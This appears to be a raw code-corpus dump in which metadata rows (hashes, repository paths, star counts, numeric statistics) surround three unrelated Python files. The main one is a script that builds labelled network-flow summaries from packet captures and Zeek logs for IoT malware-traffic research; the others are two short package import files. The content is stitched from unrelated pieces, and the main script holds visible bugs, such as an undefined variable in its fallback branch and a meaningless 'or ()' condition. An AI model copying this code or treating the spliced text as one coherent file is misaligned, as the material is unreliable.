| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
e7433efbf6c922a17c992011ec239e2b1f62958d
| 34,741
|
py
|
Python
|
scripts/adding_more_information/adding_more_information_netflow.py
|
mrjojo11/malpaca-pub
|
26fd3a7045288bed66d624e0f5593067ff05952d
|
[
"MIT"
] | null | null | null |
scripts/adding_more_information/adding_more_information_netflow.py
|
mrjojo11/malpaca-pub
|
26fd3a7045288bed66d624e0f5593067ff05952d
|
[
"MIT"
] | null | null | null |
scripts/adding_more_information/adding_more_information_netflow.py
|
mrjojo11/malpaca-pub
|
26fd3a7045288bed66d624e0f5593067ff05952d
|
[
"MIT"
] | null | null | null |
import csv
import glob
import math
import os
import sys
from random import random, seed
import socket
from timeit import default_timer as timer
import time
from statistics import mean
from pathlib import Path
import networkx as nx
import numpy as np
from scapy.layers.inet import IP, UDP
from scapy.utils import PcapWriter, PcapReader
import tkinter as tk
from tkinter import filedialog
import zat
from zat.log_to_dataframe import LogToDataFrame
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.font_manager import FontProperties
from matplotlib.pyplot import cm
import matplotlib.transforms as mtrans
class Adding_More_Information_Netflow():
@staticmethod
def adding_name_info_and_rename_labels_of_benign_devices_for_netflow(path_to_filtered_files, path_to_name_info):
path_to_filtered_files = path_to_filtered_files
path_to_name_info = path_to_name_info
name_info_df = pd.read_csv(path_to_name_info)
scan_file_order_path = path_to_filtered_files + "/scan_order.txt"
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = [(x.split(",")[0], x.split(",")[1]) for x in scanned_files_list]
for index, (scenario, file_name) in enumerate(scanned_files_list):
print("Scenario " + str(index + 1) + "/" + str(len(scanned_files_list)))
name = name_info_df[name_info_df["scenario_name"] == scenario]["name"].values[0]
path_to_csv_file = path_to_filtered_files + "/" + scenario + "/" + file_name + "/" + file_name + "_summary.csv"
summary_csv_df = pd.read_csv(path_to_csv_file)
summary_csv_df["name"] = name
columns_list = ["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol", "scenario", "file",
"connection_length", "label", "detailed_label",
"detailed_label_count", "name", "status"]
summary_csv_df = summary_csv_df.reindex(columns=columns_list)
summary_csv_df.to_csv(path_to_csv_file, index=False)
@staticmethod
def create_summary_from_separate_files_for_netflow(path_to_iot_scenarios_folder, folder_to_filtered_files, filename_addition):
path_to_iot_scenarios_folder = path_to_iot_scenarios_folder
folder_to_filtered_files = folder_to_filtered_files
filename_addition = filename_addition
scan_file_order_path = folder_to_filtered_files + "/" + "scan_order.txt"
scanned_files = []
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
scanned_files_list = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), scanned_files_list))
scanned_files_list = sorted(list(set(scanned_files_list)))
for index, (scenario_name, file_name) in enumerate(scanned_files_list):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(scanned_files_list)))
log_order_path = folder_to_filtered_files + "/" + "log_order.txt"
with open(log_order_path, 'a') as log_order_file:
log_order_file.write(scenario_name + "," + file_name + "\n")
log_order_file.close()
print("Reading PCAP File")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + filename_addition + ".pcap"
path_to_original_folder = path_to_iot_scenarios_folder + "/" + scenario_name
path_to_old_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_old.csv"
path_to_bro_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_bro.csv"
path_to_merge_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_merge.csv"
file_packet_dic = {}
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int) or ():
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
ip_tos = packet_dic["IP"]["tos"]
if (src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos) in file_packet_dic:
old_value = file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos)]
new_value = old_value + 1
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos)] = new_value
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos)] = 1
packets.close()
src_ip_list = []
dst_ip_list = []
ip_protocol_list = []
src_port_list = []
dst_port_list = []
ip_tos_list = []
connection_length_list = []
for (src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos), connection_length in file_packet_dic.items():
src_ip_list.append(src_ip)
dst_ip_list.append(dst_ip)
ip_protocol_list.append(ip_protocol)
src_port_list.append(src_port)
dst_port_list.append(dst_port)
ip_tos_list.append(ip_tos)
connection_length_list.append(connection_length)
data = {"src_ip": src_ip_list, "dst_ip": dst_ip_list, "ip_protocol" : ip_protocol_list, "src_port" : src_port_list,
"dst_port" : dst_port_list, "ip_tos" : ip_tos_list, "connection_length": connection_length_list}
old_info_df = pd.DataFrame(data)
old_info_df["scenario"] = scenario_name
old_info_df["file"] = file_name
print("Adding Logg Data")
sub_folders = [f.path for f in os.scandir(path_to_original_folder) if f.is_dir()]
bro_folder_found = False
for sub_folder in sub_folders:
base_name = str(os.path.basename(sub_folder))
if base_name == "bro":
labeled_files = glob.glob(sub_folder + "/*.labeled")
bro_folder_found = True
break
if bro_folder_found and len(labeled_files) > 0:
logg_file = labeled_files[0]
zat = LogToDataFrame()
bro_original_df = zat.create_dataframe(logg_file)
bro_original_df["label"] = bro_original_df["tunnel_parents label detailed-label"].apply(
lambda x: x.split(" ")[1].strip())
bro_original_df["detailed_label"] = bro_original_df["tunnel_parents label detailed-label"].apply(
lambda x: x.split(" ")[2].strip())
bro_original_df = bro_original_df.rename(columns={"id.orig_h": "src_ip", "id.resp_h": "dst_ip", "id.orig_p" : "src_port", "id.resp_p" : "dst_port", "proto" : "ip_protocol"})
bro_original_df = bro_original_df.drop(
columns=['uid', 'service', 'duration', 'orig_bytes', 'resp_bytes', 'conn_state', 'local_orig',
'local_resp', 'missed_bytes', 'history', 'orig_pkts', 'orig_ip_bytes',
'resp_pkts', 'resp_ip_bytes', 'tunnel_parents label detailed-label'])
bro_original_df["ip_protocol"] = bro_original_df["ip_protocol"].str.upper()
bro_original_df.sort_values(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], inplace=True)
bro_original_df = bro_original_df.groupby(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"])[
'detailed_label'].value_counts().to_frame()
bro_original_df = bro_original_df.rename(columns={"detailed_label": "detailed_label_count"})
bro_original_df = bro_original_df.reset_index()
bro_original_df["src_ip"] = bro_original_df["src_ip"].apply(lambda x: str(x).strip())
bro_original_df["dst_ip"] = bro_original_df["dst_ip"].apply(lambda x: str(x).strip())
bro_original_df["src_port"] = bro_original_df["src_port"].apply(lambda x: str(x).strip())
bro_original_df["dst_port"] = bro_original_df["dst_port"].apply(lambda x: str(x).strip())
bro_original_df["ip_protocol"] = bro_original_df["ip_protocol"].apply(lambda x: str(x).strip())
bro_original_df["src_ip"] = bro_original_df["src_ip"].astype(str)
bro_original_df["dst_ip"] = bro_original_df["dst_ip"].astype(str)
bro_original_df["src_port"] = bro_original_df["src_port"].astype(str)
bro_original_df["dst_port"] = bro_original_df["dst_port"].astype(str)
bro_original_df["ip_protocol"] = bro_original_df["ip_protocol"].astype(str)
bro_original_df = bro_original_df.sort_values(by=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"])
bro_original_df = bro_original_df.set_index(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"])
old_info_df = old_info_df.sort_values(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"])
old_info_df = old_info_df.set_index(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"])
merged_df = old_info_df.merge(on=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], right=bro_original_df, how="inner")
merged_df = merged_df.reset_index()
old_info_df = old_info_df.reset_index()
detailed_label_df = merged_df.drop_duplicates(subset=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], keep=False)
detailed_label_df["status"] = "Found"
deleted_df = merged_df[merged_df.duplicated(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], keep=False)]
deleted_df["status"] = "Mixed"
to_check_df = pd.concat(
[old_info_df, merged_df.drop_duplicates(subset=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], keep='last')]).drop_duplicates(
subset=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], keep=False)
to_check_df = to_check_df.reset_index()
to_check_df = to_check_df.rename(columns={"src_ip": "dst_ip", "dst_ip": "src_ip", "src_port" : "dst_port", "dst_port" : "src_port"}).drop(
columns=["detailed_label", "detailed_label_count"])
to_check_df["src_ip"] = to_check_df["src_ip"].apply(lambda x: str(x).strip())
to_check_df["dst_ip"] = to_check_df["dst_ip"].apply(lambda x: str(x).strip())
to_check_df["src_port"] = to_check_df["src_port"].apply(lambda x: str(x).strip())
to_check_df["dst_port"] = to_check_df["dst_port"].apply(lambda x: str(x).strip())
to_check_df["ip_protocol"] = to_check_df["ip_protocol"].apply(lambda x: str(x).strip())
to_check_df["src_ip"] = to_check_df["src_ip"].astype(str)
to_check_df["dst_ip"] = to_check_df["dst_ip"].astype(str)
to_check_df["src_port"] = to_check_df["src_port"].astype(str)
to_check_df["dst_port"] = to_check_df["dst_port"].astype(str)
to_check_df["ip_protocol"] = to_check_df["ip_protocol"].astype(str)
to_check_df = to_check_df.set_index(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"])
merged_df_2 = to_check_df.merge(on=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], right=bro_original_df, how="left")
merged_df_2 = merged_df_2.reset_index()
merged_df_2 = merged_df_2.rename(columns={"src_ip": "dst_ip", "dst_ip": "src_ip", "src_port" : "dst_port", "dst_port" : "src_port"})
detailed_label_2_df = merged_df_2.dropna()
detailed_label_2_df["status"] = "Response"
deleted_2_df = merged_df_2[merged_df_2.duplicated(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], keep=False)]
deleted_2_df["status"] = "Mixed"
unknown_df = merged_df_2[merged_df_2.isnull().any(axis=1)]
unknown_df["status"] = "Unknown"
combined_detailed_label_df = detailed_label_df.append(detailed_label_2_df)
combined_detailed_label_2_df = combined_detailed_label_df.drop_duplicates(subset=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"],
keep=False)
# combined_detailed_label_2_df["status"] = "Keep"
deleted_3_df = combined_detailed_label_df[
combined_detailed_label_df.duplicated(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], keep=False)]
combined_deleted_df = deleted_df.append(deleted_2_df).append(deleted_3_df)
combined_deleted_df = combined_deleted_df.drop_duplicates(subset=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol", 'detailed_label'],
keep='last')
combined_deleted_df["status"] = "Mixed"
combined_df = combined_detailed_label_2_df.append(combined_deleted_df).append(unknown_df)
combined_df["detailed_label"] = combined_df.detailed_label.astype(str)
combined_df["detailed_label"] = combined_df["detailed_label"].fillna(value="Unknown")
combined_df["detailed_label_count"] = combined_df["detailed_label_count"].fillna(value="0")
combined_df["detailed_label"] = combined_df["detailed_label"].replace(to_replace="nan", value="Unknown")
combined_df["detailed_label"] = combined_df["detailed_label"].replace(to_replace="-", value="Benign")
combined_df["label"] = np.where(combined_df["detailed_label"] == "Benign", "Benign", "Malicious")
combined_df["label"] = np.where(combined_df["detailed_label"] == "Unknown", "Unknown",
combined_df["label"])
columns_list = ["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol", "ip_tos", "scenario", "file",
"connection_length", "label", "detailed_label", "detailed_label_count", "status"]
combined_df = combined_df.reindex(columns=columns_list)
combined_df.to_csv(path_to_csv_file, index=False)
else:
old_info_df["label"] = "Unknown"
old_info_df["detailed_label"] = "Unknown"
old_info_df["detailed_label_count"] = 0
old_info_df["status"] = "Unknown"
columns_list = ["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol", "ip_tos", "scenario", "file",
"connection_length", "label", "detailed_label", "detailed_label_count", "status"]
old_info_df = combined_df.reindex(columns=columns_list)
old_info_df.to_csv(path_to_csv_file, index=False)
@staticmethod
def restart_creating_summary_from_separate_files_for_netflow(path_to_iot_scenarios_folder, folder_to_filtered_files,
filename_addition):
path_to_iot_scenarios_folder = path_to_iot_scenarios_folder
folder_to_filtered_files = folder_to_filtered_files
filename_addition = filename_addition
scan_file_order_path = folder_to_filtered_files + "/scan_order.txt"
log_order_path = folder_to_filtered_files + "/log_order.txt"
with open(scan_file_order_path, 'r') as inputfile:
scanned_files = inputfile.readlines()
with open(log_order_path, 'r') as inputfile:
logged_files = inputfile.readlines()
scanned_files_list = [x.strip() for x in scanned_files]
logged_files_list = [x.strip() for x in logged_files]
folders_still_to_scan = []
for scanned_file in scanned_files_list:
if scanned_file not in logged_files_list:
folders_still_to_scan.append(scanned_file)
folders = folders_still_to_scan
folders = list(map(lambda x: (x.split(",")[0], x.split(",")[1]), folders))
for index, (scenario_name, file_name) in enumerate(folders):
print("Scenario name: " + scenario_name)
print("File name : " + file_name)
print("Number: " + str(index + 1) + "/" + str(len(folders)))
log_order_path = folder_to_filtered_files + "/" + "log_order.txt"
with open(log_order_path, 'a') as log_order_file:
log_order_file.write(scenario_name + "," + file_name + "\n")
log_order_file.close()
print("Reading PCAP File")
path_to_csv_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_summary.csv"
path_to_pcap_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_" + filename_addition + ".pcap"
path_to_original_folder = path_to_iot_scenarios_folder + "/" + scenario_name
path_to_old_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_old.csv"
path_to_bro_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_bro.csv"
path_to_merge_file = folder_to_filtered_files + "/" + scenario_name + "/" + file_name + "/" + file_name + "_merge.csv"
file_packet_dic = {}
with PcapReader(path_to_pcap_file) as packets:
for packet_count, packet in enumerate(packets):
packet_string = packet.show(dump=True)
packet_for_print = packet_string
packet_string = packet_string.split("\n")
packet_string = [x.replace(" ", "") for x in packet_string]
current_layer = "none"
packet_dic = {}
for line in packet_string:
if len(line) > 0:
if line[0] == '#':
new_layer = line.split('[')[1].split(']')[0]
current_layer = new_layer
packet_dic[current_layer] = {}
elif (line[0] != '\\') & (line[0] != '|'):
key = line.split("=")[0]
value = line.split("=")[1]
packet_dic[current_layer][key] = value
src_ip = packet_dic["IP"]["src"]
dst_ip = packet_dic["IP"]["dst"]
ip_protocol = packet_dic["IP"]["proto"].upper()
if ip_protocol == "UDP" and "UDP" in packet_dic:
src_port = packet_dic["UDP"]["sport"]
dst_port = packet_dic["UDP"]["dport"]
elif ip_protocol == "TCP" and "TCP" in packet_dic:
src_port = packet_dic["TCP"]["sport"]
dst_port = packet_dic["TCP"]["dport"]
elif ip_protocol == "ICMP" and "ICMP" in packet_dic:
src_port = 0
dst_port = str(packet_dic["ICMP"]["type"]) + "/" + str(packet_dic["ICMP"]["code"])
else:
src_port = 0
dst_port = 0
if not isinstance(src_port, int):
if not all(char.isdigit() for char in src_port):
try:
src_port = socket.getservbyname(src_port, ip_protocol)
except:
src_port = src_port
if not isinstance(dst_port, int) or ():
if not all(char.isdigit() for char in dst_port):
try:
dst_port = socket.getservbyname(dst_port, ip_protocol)
except:
dst_port = dst_port
ip_tos = packet_dic["IP"]["tos"]
if (src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos) in file_packet_dic:
old_value = file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos)]
new_value = old_value + 1
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos)] = new_value
else:
file_packet_dic[(src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos)] = 1
packets.close()
src_ip_list = []
dst_ip_list = []
ip_protocol_list = []
src_port_list = []
dst_port_list = []
ip_tos_list = []
connection_length_list = []
for (src_ip, dst_ip, ip_protocol, src_port, dst_port, ip_tos), connection_length in file_packet_dic.items():
src_ip_list.append(src_ip)
dst_ip_list.append(dst_ip)
ip_protocol_list.append(ip_protocol)
src_port_list.append(src_port)
dst_port_list.append(dst_port)
ip_tos_list.append(ip_tos)
connection_length_list.append(connection_length)
data = {"src_ip": src_ip_list, "dst_ip": dst_ip_list, "ip_protocol": ip_protocol_list,
"src_port": src_port_list,
"dst_port": dst_port_list, "ip_tos": ip_tos_list, "connection_length": connection_length_list}
old_info_df = pd.DataFrame(data)
old_info_df["scenario"] = scenario_name
old_info_df["file"] = file_name
print("Adding Logg Data")
sub_folders = [f.path for f in os.scandir(path_to_original_folder) if f.is_dir()]
bro_folder_found = False
for sub_folder in sub_folders:
base_name = str(os.path.basename(sub_folder))
if base_name == "bro":
labeled_files = glob.glob(sub_folder + "/*.labeled")
bro_folder_found = True
break
if bro_folder_found and len(labeled_files) > 0:
logg_file = labeled_files[0]
zat = LogToDataFrame()
bro_original_df = zat.create_dataframe(logg_file)
bro_original_df["label"] = bro_original_df["tunnel_parents label detailed-label"].apply(
lambda x: x.split(" ")[1].strip())
bro_original_df["detailed_label"] = bro_original_df["tunnel_parents label detailed-label"].apply(
lambda x: x.split(" ")[2].strip())
bro_original_df = bro_original_df.rename(
columns={"id.orig_h": "src_ip", "id.resp_h": "dst_ip", "id.orig_p": "src_port",
"id.resp_p": "dst_port", "proto": "ip_protocol"})
bro_original_df = bro_original_df.drop(
columns=['uid', 'service', 'duration', 'orig_bytes', 'resp_bytes', 'conn_state', 'local_orig',
'local_resp', 'missed_bytes', 'history', 'orig_pkts', 'orig_ip_bytes',
'resp_pkts', 'resp_ip_bytes', 'tunnel_parents label detailed-label'])
bro_original_df["ip_protocol"] = bro_original_df["ip_protocol"].str.upper()
bro_original_df.sort_values(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], inplace=True)
bro_original_df = bro_original_df.groupby(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"])[
'detailed_label'].value_counts().to_frame()
bro_original_df = bro_original_df.rename(columns={"detailed_label": "detailed_label_count"})
bro_original_df = bro_original_df.reset_index()
bro_original_df["src_ip"] = bro_original_df["src_ip"].apply(lambda x: str(x).strip())
bro_original_df["dst_ip"] = bro_original_df["dst_ip"].apply(lambda x: str(x).strip())
bro_original_df["src_port"] = bro_original_df["src_port"].apply(lambda x: str(x).strip())
bro_original_df["dst_port"] = bro_original_df["dst_port"].apply(lambda x: str(x).strip())
bro_original_df["ip_protocol"] = bro_original_df["ip_protocol"].apply(lambda x: str(x).strip())
# bro_original_df["src_ip"] = bro_original_df["src_ip"].astype(str)
# bro_original_df["dst_ip"] = bro_original_df["dst_ip"].astype(str)
# bro_original_df["src_port"] = bro_original_df["src_port"].astype(str)
# bro_original_df["dst_port"] = bro_original_df["dst_port"].astype(str)
# bro_original_df["ip_protocol"] = bro_original_df["ip_protocol"].astype(str)
bro_original_df = bro_original_df.sort_values(
by=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"])
# bro_original_df = bro_original_df.set_index(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"])
old_info_df = old_info_df.sort_values(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"])
# old_info_df = old_info_df.set_index(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"])
merged_df = old_info_df.merge(on=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"],
right=bro_original_df, how="inner")
merged_df = merged_df.reset_index()
old_info_df = old_info_df.reset_index()
detailed_label_df = merged_df.drop_duplicates(
subset=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], keep=False)
detailed_label_df["status"] = "Found"
deleted_df = merged_df[
merged_df.duplicated(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], keep=False)]
deleted_df["status"] = "Mixed"
to_check_df = pd.concat(
[old_info_df,
merged_df.drop_duplicates(subset=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"],
keep='last')]).drop_duplicates(
subset=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], keep=False)
to_check_df = to_check_df.reset_index()
to_check_df = to_check_df.rename(
columns={"src_ip": "dst_ip", "dst_ip": "src_ip", "src_port": "dst_port",
"dst_port": "src_port"}).drop(
columns=["detailed_label", "detailed_label_count"])
to_check_df["src_ip"] = to_check_df["src_ip"].apply(lambda x: str(x).strip())
to_check_df["dst_ip"] = to_check_df["dst_ip"].apply(lambda x: str(x).strip())
to_check_df["src_port"] = to_check_df["src_port"].apply(lambda x: str(x).strip())
to_check_df["dst_port"] = to_check_df["dst_port"].apply(lambda x: str(x).strip())
to_check_df["ip_protocol"] = to_check_df["ip_protocol"].apply(lambda x: str(x).strip())
to_check_df["src_ip"] = to_check_df["src_ip"].astype(str)
to_check_df["dst_ip"] = to_check_df["dst_ip"].astype(str)
to_check_df["src_port"] = to_check_df["src_port"].astype(str)
to_check_df["dst_port"] = to_check_df["dst_port"].astype(str)
to_check_df["ip_protocol"] = to_check_df["ip_protocol"].astype(str)
to_check_df = to_check_df.set_index(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"])
merged_df_2 = to_check_df.merge(on=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"],
right=bro_original_df, how="left")
#merged_df_2 = merged_df_2.reset_index()
merged_df_2 = merged_df_2.rename(
columns={"src_ip": "dst_ip", "dst_ip": "src_ip", "src_port": "dst_port", "dst_port": "src_port"})
detailed_label_2_df = merged_df_2.dropna()
detailed_label_2_df["status"] = "Response"
deleted_2_df = merged_df_2[
merged_df_2.duplicated(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"], keep=False)]
deleted_2_df["status"] = "Mixed"
unknown_df = merged_df_2[merged_df_2.isnull().any(axis=1)]
unknown_df["status"] = "Unknown"
combined_detailed_label_df = detailed_label_df.append(detailed_label_2_df)
combined_detailed_label_2_df = combined_detailed_label_df.drop_duplicates(
subset=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"],
keep=False)
# combined_detailed_label_2_df["status"] = "Keep"
deleted_3_df = combined_detailed_label_df[
combined_detailed_label_df.duplicated(["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol"],
keep=False)]
combined_deleted_df = deleted_df.append(deleted_2_df).append(deleted_3_df)
combined_deleted_df = combined_deleted_df.drop_duplicates(
subset=["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol", 'detailed_label'],
keep='last')
combined_deleted_df["status"] = "Mixed"
combined_df = combined_detailed_label_2_df.append(combined_deleted_df).append(unknown_df)
combined_df["detailed_label"] = combined_df.detailed_label.astype(str)
combined_df["detailed_label"] = combined_df["detailed_label"].fillna(value="Unknown")
combined_df["detailed_label_count"] = combined_df["detailed_label_count"].fillna(value="0")
combined_df["detailed_label"] = combined_df["detailed_label"].replace(to_replace="nan", value="Unknown")
combined_df["detailed_label"] = combined_df["detailed_label"].replace(to_replace="-", value="Benign")
combined_df["label"] = np.where(combined_df["detailed_label"] == "Benign", "Benign", "Malicious")
combined_df["label"] = np.where(combined_df["detailed_label"] == "Unknown", "Unknown",
combined_df["label"])
columns_list = ["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol", "ip_tos", "scenario", "file",
"connection_length", "label", "detailed_label", "detailed_label_count", "status"]
combined_df = combined_df.reindex(columns=columns_list)
combined_df.to_csv(path_to_csv_file, index=False)
else:
old_info_df["label"] = "Unknown"
old_info_df["detailed_label"] = "Unknown"
old_info_df["detailed_label_count"] = 0
old_info_df["status"] = "Unknown"
columns_list = ["src_ip", "dst_ip", "src_port", "dst_port", "ip_protocol", "ip_tos", "scenario", "file",
"connection_length", "label", "detailed_label", "detailed_label_count", "status"]
old_info_df = combined_df.reindex(columns=columns_list)
old_info_df.to_csv(path_to_csv_file, index=False)
| 55.764045
| 189
| 0.571745
| 4,269
| 34,741
| 4.219724
| 0.056454
| 0.040802
| 0.063506
| 0.030532
| 0.938548
| 0.934551
| 0.926002
| 0.924836
| 0.918952
| 0.914344
| 0
| 0.003813
| 0.305432
| 34,741
| 622
| 190
| 55.853698
| 0.742727
| 0.020149
| 0
| 0.756813
| 0
| 0
| 0.150867
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.006289
| false
| 0
| 0.050314
| 0
| 0.0587
| 0.027254
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e7a8692e2e33795766d9ef7bad280086b02c3f7e
| 220
|
py
|
Python
|
bitmovin_api_sdk/encoding/encodings/streams/filters/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 11
|
2019-07-03T10:41:16.000Z
|
2022-02-25T21:48:06.000Z
|
bitmovin_api_sdk/encoding/encodings/streams/filters/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 8
|
2019-11-23T00:01:25.000Z
|
2021-04-29T12:30:31.000Z
|
bitmovin_api_sdk/encoding/encodings/streams/filters/__init__.py
|
jaythecaesarean/bitmovin-api-sdk-python
|
48166511fcb9082041c552ace55a9b66cc59b794
|
[
"MIT"
] | 13
|
2020-01-02T14:58:18.000Z
|
2022-03-26T12:10:30.000Z
|
from bitmovin_api_sdk.encoding.encodings.streams.filters.filters_api import FiltersApi
from bitmovin_api_sdk.encoding.encodings.streams.filters.stream_filter_list_list_query_params import StreamFilterListListQueryParams
| 73.333333
| 132
| 0.918182
| 28
| 220
| 6.857143
| 0.571429
| 0.125
| 0.15625
| 0.1875
| 0.510417
| 0.510417
| 0.510417
| 0.510417
| 0
| 0
| 0
| 0
| 0.036364
| 220
| 2
| 133
| 110
| 0.90566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
415c302f89eb8117ad7f9f42b965b371b0dfc200
| 297
|
py
|
Python
|
platform/hwconf_data/efm32zg/modules/WDOG/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | null | null | null |
platform/hwconf_data/efm32zg/modules/WDOG/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | 1
|
2020-08-25T02:36:22.000Z
|
2020-08-25T02:36:22.000Z
|
platform/hwconf_data/efm32zg/modules/WDOG/__init__.py
|
lenloe1/v2.7
|
9ac9c4a7bb37987af382c80647f42d84db5f2e1d
|
[
"Zlib"
] | 1
|
2020-08-25T01:56:04.000Z
|
2020-08-25T01:56:04.000Z
|
import efm32zg.halconfig.halconfig_types as halconfig_types
import efm32zg.halconfig.halconfig_dependency as halconfig_dependency
import efm32zg.PythonSnippet.ExporterModel as ExporterModel
import efm32zg.PythonSnippet.RuntimeModel as RuntimeModel
import efm32zg.PythonSnippet.Metadata as Metadata
| 59.4
| 69
| 0.902357
| 34
| 297
| 7.764706
| 0.294118
| 0.246212
| 0.295455
| 0.234848
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035971
| 0.063973
| 297
| 5
